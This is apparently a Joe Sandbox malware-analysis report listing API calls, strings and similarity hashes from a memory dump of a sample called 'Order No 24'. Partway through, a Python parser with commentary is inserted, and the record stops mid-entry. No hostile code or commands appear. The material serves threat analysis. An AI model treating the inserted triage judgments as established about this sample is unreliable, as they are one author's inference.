                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                  • Opcode ID: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                                                                                                                  • Instruction ID: 4bee7750e9294dc8818bba5659998a05c8aa5d9ee9b224b1d86e4d4421de7552
                                                                                                                                  • Opcode Fuzzy Hash: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                                                                                                                  • Instruction Fuzzy Hash: C5E0BF37104009BBCB016BD5EC08859FF66FF883213109221F62581571CB329473EB52
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                                                                                                                  • Instruction ID: f3d48b6fc02f2c0dec7c88d101fa13bd71434b65aaedaf02c62e7a5c6a801127
                                                                                                                                  • Opcode Fuzzy Hash: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                                                                                                                  • Instruction Fuzzy Hash: 89E046B2500208EFDF009FF0C84862DBBA8EB4C351F118809F95E8B210DB7A98438B00
                                                                                                                                  APIs
                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 009BDEAA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContainedObject
                                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                                  • API String ID: 3565006973-3941886329
                                                                                                                                  • Opcode ID: 4bd5f115e2e9ee9796ca70b5f991f620de9a3fc518a09d55fabf3a0b0a4df74a
                                                                                                                                  • Instruction ID: 471ae615761f8dfff54ba510d19b29f99eb187dfb83bc6dc6d7a6abd35d8f5d7
                                                                                                                                  • Opcode Fuzzy Hash: 4bd5f115e2e9ee9796ca70b5f991f620de9a3fc518a09d55fabf3a0b0a4df74a
                                                                                                                                  • Instruction Fuzzy Hash: EF914A70601701AFDB14CF64C984BAAB7F9BF88720F10896DF94ACB691EB70E841CB50
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • __wcsnicmp.LIBCMT ref: 009CDEFD
                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009CDFC6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                  • String ID: LPT
                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                  • Opcode ID: 9db72cd7abf5f14f65a7accbc2d3f8c43310e807d6b765d2ff2bd7c053c0da31
                                                                                                                                  • Instruction ID: 1d3cf33a1795dd31e4811a8f5a73b7460fedf622c1189f2717f9dd794705d666
                                                                                                                                  • Opcode Fuzzy Hash: 9db72cd7abf5f14f65a7accbc2d3f8c43310e807d6b765d2ff2bd7c053c0da31
                                                                                                                                  • Instruction Fuzzy Hash: E6616D75E04215AFCB14EF98C891FAEB7B8BF48310F05406EF546AB291D774AE40CB92
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 0099BCDA
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0099BCF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                  • Opcode ID: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                                                                                                                  • Instruction ID: cdf67357d8fa45c69f8248268824e24c0dc8fecfbe837ead62c5c0ca5a991cf2
                                                                                                                                  • Opcode Fuzzy Hash: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                                                                                                                  • Instruction Fuzzy Hash: 67512571409748ABE720AF58DC86BAFBBE8FFD4354F41484EF1C8410A6EB7085A9C756
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009844ED: __fread_nolock.LIBCMT ref: 0098450B
                                                                                                                                  • _wcscmp.LIBCMT ref: 009CC65D
                                                                                                                                  • _wcscmp.LIBCMT ref: 009CC670
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                  • String ID: FILE
                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                  • Opcode ID: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                                                                                                                  • Instruction ID: ef38fea2c0c6813c57bbfa87c0b22a6a59ebba2e49a03420445f86801f2ab5c0
                                                                                                                                  • Opcode Fuzzy Hash: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                                                                                                                  • Instruction Fuzzy Hash: D5419672A0021ABBDF10AAA4DC42FEF7BB9AF89714F004479F605E7191D6759A048B51
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 009EA85A
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009EA86F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: '
                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                  • Opcode ID: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                                                                                                                  • Instruction ID: bc98c4883f003762d28e6be83bc15eba62c8c7c2933411bbaae0d85737d71b38
                                                                                                                                  • Opcode Fuzzy Hash: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                                                                                                                  • Instruction Fuzzy Hash: 0B410A75E013499FDB15CFA9C880BDABBB9FB49300F11006AE905AB351D775AD42CFA1
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009D5190
                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009D51C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                  • String ID: |
                                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                                  • Opcode ID: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                                                                                                                  • Instruction ID: 56c262b60fc5641bb00b26b0961ccc8b275a6e9c97c4dbd96569538433fdc9b7
                                                                                                                                  • Opcode Fuzzy Hash: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                                                                                                                  • Instruction Fuzzy Hash: 82313C71C00119ABCF01EFE4CC85AEE7FB9FF54750F10401AF915A6266DB31AA06DBA0
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 009E980E
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009E984A
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                  • Opcode ID: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                                                                                                                  • Instruction ID: 48799173540fbe933459269add76b207c04179eeb262195f0bcfa74cde7d934d
                                                                                                                                  • Opcode Fuzzy Hash: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                                                                                                                  • Instruction Fuzzy Hash: 17317C71110644AAEB119F79CC80BBB73ADFF99764F008619F9A9C71A0DA31AC82C760
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C51C6
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009C5201
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: d66dede9cf7abbbbbaaf221f90066445a5fa58e190bf62a564e96f6bc721594f
                                                                                                                                  • Instruction ID: 1fa709b9c4029c1341cc3ebac93cc366de5972a730c1d395d309eb88bdd44625
                                                                                                                                  • Opcode Fuzzy Hash: d66dede9cf7abbbbbaaf221f90066445a5fa58e190bf62a564e96f6bc721594f
                                                                                                                                  • Instruction Fuzzy Hash: F431D571E007049BEB24CF99D845FAEBBFCAF85350F15401DE9A1A61A0D770A984DB12
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __snwprintf
                                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                  • API String ID: 2391506597-2584243854
                                                                                                                                  • Opcode ID: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                                                                                                                  • Instruction ID: 59058fe38fafe55d6469d001a849faad6f4bd13236cd63fc520fb937d4899006
                                                                                                                                  • Opcode Fuzzy Hash: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                                                                                                                  • Instruction Fuzzy Hash: 0E217171644219AFCF10EFA4C882FEE77B4BF95744F40485AF505AB281DB70EA45CBA1
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009E945C
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E9467
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: Combobox
                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                  • Opcode ID: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                                                                                                                  • Instruction ID: 0109a1078c69616cef20d6eaa2950dd8ca08287b3c2dce3b115fd424633dc32d
                                                                                                                                  • Opcode Fuzzy Hash: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                                                                                                                  • Instruction Fuzzy Hash: BB116071210258AFEF26DE55DC80EBB376FEB893A4F104125F919972E0E6719C528760
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                                                                                                                    • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                                                                                                                    • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009E9968
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 009E9982
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                  • Opcode ID: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                                                                                                                  • Instruction ID: d121deab6dcc21004289d65d8789bec0d943943dfd995a7dc69ef0bb8273b543
                                                                                                                                  • Opcode Fuzzy Hash: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                                                                                                                  • Instruction Fuzzy Hash: DA116772520209AFDB05DFF8CC45AEA7BA8FB48304F014A28F955E3251E735E851DB60
                                                                                                                                  APIs
                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 009E9699
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009E96A8
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                  • String ID: edit
                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                  • Opcode ID: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                                                                                                                  • Instruction ID: 7143405c36960dac7e75f65741b7540be306925499daf0a984018ea2f529b488
                                                                                                                                  • Opcode Fuzzy Hash: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                                                                                                                  • Instruction Fuzzy Hash: 0F11BC72100188ABEF128FA9DC80EEB3B6EEB457B8F100716F925971E0C736DC919760
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C52D5
                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009C52F4
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                                                                                                                  • Instruction ID: 12717a721e6cdf932634e1a965f8ac30d00582a20a8fb6fb473baee0d5f9db3e
                                                                                                                                  • Opcode Fuzzy Hash: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                                                                                                                  • Instruction Fuzzy Hash: D2110336E00614EBDB10DA98C840F9D77ECAB86350F060019E812E7190D3B0BD81CB92
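The function records on this page each list the imported APIs a function of the dumped image calls (with the raw argument values Joe Sandbox recovered) and the Similarity fields (API ID, String ID, API String ID, fuzzy hashes) used to match functions across reports. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records laid out as above, names the numeric constants that appear in these calls (the SendMessageW message IDs 0x143, 0x14E, 0xB1 and 0x30; WinINet option 0x32; stock object 0x11; system colour 0x12), and indexes records by API String ID. The sample text is constructed from records on this page with the indentation removed; the constant table, regexes and function names are the example's own.

```python
"""Parse Joe Sandbox function records (APIs + Similarity) and name the
numeric constants in the calls. Added example; not Joe Sandbox tooling."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: three records in this report's own layout (indentation
# dropped). Lines under "Memory Dump Source" / "Strings" are skipped.
SAMPLE = """\
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009E945C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E9467
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
• GetSysColor.USER32(00000012), ref: 009E9982
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009D4DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009D4E1E
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Meanings of the numeric arguments seen in the records on this page, keyed by
# (API name, zero-based argument index). This table is the example's own.
KNOWN_CONSTANTS = {
    ("SendMessageW", 1): {0x30: "WM_SETFONT", 0xB1: "EM_SETSEL",
                          0x143: "CB_ADDSTRING", 0x14E: "CB_SETCURSEL"},
    ("InternetSetOptionW", 1): {0x32: "INTERNET_OPTION_CONNECTED_STATE"},
    ("GetStockObject", 0): {0x11: "DEFAULT_GUI_FONT"},
    ("GetSysColor", 0): {0x12: "COLOR_BTNTEXT"},
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                    # call-site address in the dump
    caller: str | None = None   # set when listed as "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # Similarity fields

def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into records; every 'APIs' header starts a new one."""
    records: list[FunctionRecord] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = FunctionRecord()
            records.append(rec)
            section = "APIs"
        elif line in SECTIONS:
            section = line
        elif rec is not None and line.startswith("•"):
            if section == "APIs" and (m := API_RE.match(line)):
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                rec.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
            elif section == "Similarity" and (m := FIELD_RE.match(line)):
                rec.fields[m["key"].strip()] = m["val"].strip()
    return records

def describe(call: ApiCall) -> str:
    """Render a call with known constants named instead of raw 8-digit hex."""
    named = []
    for i, a in enumerate(call.args):
        table = KNOWN_CONSTANTS.get((call.name, i))
        if table and re.fullmatch(r"[0-9A-Fa-f]{8}", a):
            named.append(table.get(int(a, 16), a))
        else:
            named.append(a)
    return f"{call.name}({', '.join(named)}) @ {call.ref}"

def index_by_api_string_id(records: list[FunctionRecord]) -> dict[str, FunctionRecord]:
    """Key records by 'API String ID' so they can be matched against other reports."""
    return {r.fields["API String ID"]: r for r in records if "API String ID" in r.fields}
```

Reading the decoded calls: the message IDs are ordinary combobox and edit control traffic (CB_ADDSTRING, CB_SETCURSEL, EM_SETSEL, WM_SETFONT), and InternetSetOptionW with option 0x32 and an 8-byte buffer is INTERNET_OPTION_CONNECTED_STATE taking an INTERNET_CONNECTED_INFO, i.e. forcing WinINet online before a request; "<local>" is a proxy bypass list. Together with the "$AUTOITCALLVARIABLE%d" string, these records are consistent with the AutoIt runtime's GUI and WinINet helpers in the 0x980000 image rather than with payload logic, which is worth keeping in mind when triaging which functions of this dump to spend time on.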
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009D4DF5
                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009D4E1E
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                  • String ID: <local>
                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                  • Opcode ID: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
                                                                                                                                  • Instruction ID: 8731057b6890bfd28537abcecbbff4a36de92e5e617f177aac8fc402152f4d2f
                                                                                                                                  • Opcode Fuzzy Hash: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
                                                                                                                                  • Instruction Fuzzy Hash: 21119A71581225BBDB258BA18889EEBFBADFB06794F10C62BF50596280D3706981C6F0
                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                                                                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 009DA88B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htonsinet_addr
                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                                  • Opcode ID: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                                                                                                                  • Instruction ID: fd4a273d6c8b46b6c93520ddff52aed17ce38869731d540d784be4b8b6e16cdf
                                                                                                                                  • Opcode Fuzzy Hash: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                                                                                                                  • Instruction Fuzzy Hash: B001D675640304ABCB11DFA4C856FA9B368EF44314F10882BF915973D1D771E812D752
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009BB7EF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                  • Opcode ID: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                                                                                                                  • Instruction ID: 09f3f347d836ed58154818a6fc86fc63458a84e7213978c2addf8ef667846987
